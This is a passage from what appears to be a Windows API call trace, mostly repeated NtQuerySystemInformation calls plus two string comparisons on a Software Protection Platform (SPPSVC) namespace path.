Length=0x0, ResultLength=0x0) [0289.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd70, Length=0x50, ResultLength=0x0) [0289.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dca0, Length=0x38, ResultLength=0x0) [0289.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dad0, Length=0x28, ResultLength=0x0) [0289.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dad0, Length=0x28, ResultLength=0x0) [0289.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dad0, Length=0x28, ResultLength=0x0) [0289.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db40, Length=0x28, ResultLength=0x0) [0289.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dca0, Length=0x38, ResultLength=0x0) [0289.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dbc0, Length=0x28, ResultLength=0x0) [0289.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dbc0, Length=0x28, ResultLength=0x0) [0289.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dca0, Length=0x38, ResultLength=0x0) [0289.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db20, Length=0x20, ResultLength=0x0) [0289.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217daa0, Length=0x20, ResultLength=0x0) [0289.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217daa0, Length=0x20, ResultLength=0x0) [0289.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217daa0, Length=0x20, ResultLength=0x0) [0289.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dca0, Length=0x38, ResultLength=0x0) [0289.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db20, Length=0x20, ResultLength=0x0) [0289.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dab0, Length=0x20, ResultLength=0x0) [0289.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dab0, Length=0x20, ResultLength=0x0) [0289.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217df30, Length=0x50, ResultLength=0x0) [0289.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217deb0, Length=0x28, ResultLength=0x0) [0289.726] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663\\2cb19a15-bab2-4fcb-acee-4bde5be207a5", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0289.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217df30, Length=0x50, ResultLength=0x0) [0289.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217df30, Length=0x50, ResultLength=0x0) [0289.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217df30, Length=0x50, ResultLength=0x0) [0289.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217de60, Length=0x38, ResultLength=0x0) [0289.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc90, Length=0x28, ResultLength=0x0) [0289.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc90, Length=0x28, ResultLength=0x0) [0289.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc90, Length=0x28, ResultLength=0x0) [0289.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd00, Length=0x28, ResultLength=0x0) [0289.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217de60, Length=0x38, ResultLength=0x0) [0289.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd80, Length=0x28, ResultLength=0x0) [0289.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd80, Length=0x28, ResultLength=0x0) [0289.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217de60, Length=0x38, ResultLength=0x0) [0289.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dce0, Length=0x20, ResultLength=0x0) [0289.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc60, Length=0x20, ResultLength=0x0) [0289.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc60, Length=0x20, ResultLength=0x0) [0289.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc60, Length=0x20, ResultLength=0x0) [0289.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217de60, Length=0x38, ResultLength=0x0) [0289.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dce0, Length=0x20, ResultLength=0x0) [0289.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc70, Length=0x20, ResultLength=0x0) [0289.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc70, Length=0x20, ResultLength=0x0) [0289.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217df30, Length=0x50, ResultLength=0x0) [0289.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217deb0, Length=0x28, ResultLength=0x0) [0289.738] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663\\2cb19a15-bab2-4fcb-acee-4bde5be207a5", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0289.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217df30, Length=0x50, ResultLength=0x0) [0289.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217df30, Length=0x50, ResultLength=0x0) [0289.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217df30, Length=0x50, ResultLength=0x0) [0289.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217de60, Length=0x38, ResultLength=0x0) [0289.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc90, Length=0x28, ResultLength=0x0) [0289.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc90, Length=0x28, ResultLength=0x0) [0289.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc90, Length=0x28, ResultLength=0x0) [0289.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd00, Length=0x28, ResultLength=0x0) [0289.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217de60, Length=0x38, ResultLength=0x0) [0289.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd80, Length=0x28, ResultLength=0x0) [0289.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd80, Length=0x28, ResultLength=0x0) [0289.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217de60, Length=0x38, ResultLength=0x0) [0289.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dce0, Length=0x20, ResultLength=0x0) [0289.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc60, Length=0x20, ResultLength=0x0) [0289.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc60, Length=0x20, ResultLength=0x0) [0289.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc60, Length=0x20, ResultLength=0x0) [0289.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217de60, Length=0x38, ResultLength=0x0) [0289.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dce0, Length=0x20, ResultLength=0x0) [0289.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc70, Length=0x20, ResultLength=0x0) [0289.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc70, Length=0x20, ResultLength=0x0) [0289.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d9d0, Length=0x50, ResultLength=0x0) [0289.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d9d0, Length=0x50, ResultLength=0x0) [0289.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d9d0, Length=0x50, ResultLength=0x0) [0289.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d8c0, Length=0x50, ResultLength=0x0) [0289.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d8c0, Length=0x50, ResultLength=0x0) [0289.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d8c0, Length=0x50, ResultLength=0x0) [0289.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d8c0, Length=0x50, ResultLength=0x0) [0289.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d7f0, Length=0x38, ResultLength=0x0) [0289.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d620, Length=0x28, ResultLength=0x0) [0289.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d620, Length=0x28, ResultLength=0x0) [0289.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d620, Length=0x28, ResultLength=0x0) [0289.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d620, Length=0x28, ResultLength=0x0) [0289.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d690, Length=0x28, ResultLength=0x0) [0289.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d7f0, Length=0x38, ResultLength=0x0) [0289.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d710, Length=0x28, ResultLength=0x0) [0289.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d710, Length=0x28, ResultLength=0x0) [0289.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d5b0, Length=0x20, ResultLength=0x0) [0289.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d530, Length=0x20, ResultLength=0x0) [0289.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d530, Length=0x20, ResultLength=0x0) [0289.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d530, Length=0x20, ResultLength=0x0) [0289.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d7f0, Length=0x38, ResultLength=0x0) [0289.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d7f0, Length=0x38, ResultLength=0x0) [0289.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d670, Length=0x20, ResultLength=0x0) [0289.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d600, Length=0x20, ResultLength=0x0) [0289.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d600, Length=0x20, ResultLength=0x0) [0289.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc20, Length=0x50, ResultLength=0x0) [0289.810] NtQuerySystemInformation (SystemInformationClass=0xb9, 